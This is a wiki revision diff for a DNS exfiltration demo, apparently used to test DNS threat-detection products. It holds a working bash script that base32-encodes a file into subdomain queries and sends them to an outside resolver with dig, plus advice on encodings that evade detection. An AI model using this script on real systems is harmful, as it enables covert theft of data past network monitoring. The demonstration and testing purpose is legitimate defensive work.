Saucepan

User Tools

Site Tools

Trace: install_apex_upgrade configure_redmine_email dtc install_guacamole iot deploy_nios_vm docker firewall_rules duo install_ubuntu20.04
dns:dns_exfiltration

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision		Previous revision
dns:dns_exfiltration [2023/06/08 09:21] – [Simple Exfiltration] bstafforddns:dns_exfiltration [2023/11/29 15:02] (current) – [DNS Exfiltration Demo] bstafford
Line 1: Line 1:
 ===== DNS Exfiltration Demo ===== ===== DNS Exfiltration Demo =====
 [[https://hinty.io/devforth/dns-exfiltration-of-data-step-by-step-simple-guide/|Guide here]] [[https://hinty.io/devforth/dns-exfiltration-of-data-step-by-step-simple-guide/|Guide here]]
 +===== Base64 =====
 +Base64. Contains uppercase letters and defaults to allowing = and / etc. This is not recommended as it can make it easier to detect attacks as 'normal' DNS doesn't use these. Use Base32 instead.
 +
 +However, Base32 isn't available natively in many scripting toolsets. Base64 is. So some attackers use Base64 to avoid having to write their own Base32 conversion code.
 +
 +
  
  
 ===== Simple Exfiltration ===== ===== Simple Exfiltration =====
 Note that the BIND logs will be approximately 17 times the size of the transferred file. Note that the BIND logs will be approximately 17 times the size of the transferred file.
-<code> + 
-# File to be exfiltrated+Note that this is actually two scripts as the last few commands are to be run on the DNS auth server to decrypt the logs. 
 +<code># File to be exfiltrated
 SOURCE=/home/name/dns_exfil_test/file.pdf SOURCE=/home/name/dns_exfil_test/file.pdf
  
Line 17: Line 24:
  
 # sub-domain off SLD that we change for every file # sub-domain off SLD that we change for every file
-SUBDOM=nw+SUBDOM=asdf
  
 # Target DNS server (e.g. NIOS with DFP or BloxOne Host) # Target DNS server (e.g. NIOS with DFP or BloxOne Host)
-LOCALDNS=192.168.11.154+# Public IP is the BloxOne Threat Defense IP address 
 +#LOCALDNS=192.168.11.154 
 +LOCALDNS=52.119.41.100
  
-# Log file that the DNS queries can be found in on the authoratative DNS server +# Log file that the DNS queries can be found in on the authoritative DNS server 
-BIND_LOG_FILE=/var/log/named/query.log]+BIND_LOG_FILE=/var/log/named/query.log
  
-# File to put the decrypted, received file into (should be a replicat of SOURCE)+# File to put the decrypted, received file into (should be a replica of SOURCE)
 DECRYPTEDOUTPUT=/home/name/dns_exfil_test/file2.pdf DECRYPTEDOUTPUT=/home/name/dns_exfil_test/file2.pdf
  
Line 35: Line 44:
 # Then replace the whitespace at the start of each line with nothing (i.e remove it) # Then replace the whitespace at the start of each line with nothing (i.e remove it)
 # Then replace the TAB between the number and domain with a "." # Then replace the TAB between the number and domain with a "."
-base32 $SOURCE | tr -d '\n' | fold -32 | sed -e "s/$/.$SUBDOM.$DOMAIN/" | nl | sed s/^' '*//g | sed "s/\\t/./g" > $ENCRYPTED+base32 $SOURCE | tr -d '\n' | fold -62 | sed -e "s/$/.$SUBDOM.$DOMAIN/" | nl | sed s/^' '*//g | sed "s/\\t/./g" > $ENCRYPTED
  
-# The result is a file that contains a hugh list of FQDN's for us to query (exfiltrate)+# The result is a file that contains a huge list of FQDN's for us to query (exfiltrate)
  
-Use DIG to iterate over the file and resolve the DNS at full speed.+Exfiltrate the file with DIG.
 dig +short A @$LOCALDNS -f $ENCRYPTED dig +short A @$LOCALDNS -f $ENCRYPTED
- 
-# OR - if you want to add a delay into the exfiltration, use the following line. 
-# for i in $(cat $ENCRYPTED); do dig +short A @$LOCALDNS $i;sleep ;done 
  
  
 +# Delay if required.
 +#for i in $(cat $ENCRYPTED); do dig +short A @$LOCALDNS $i;sleep 0.1 ;done
  
  
dns/dns_exfiltration.1686216108.txt.gz · Last modified: by bstafford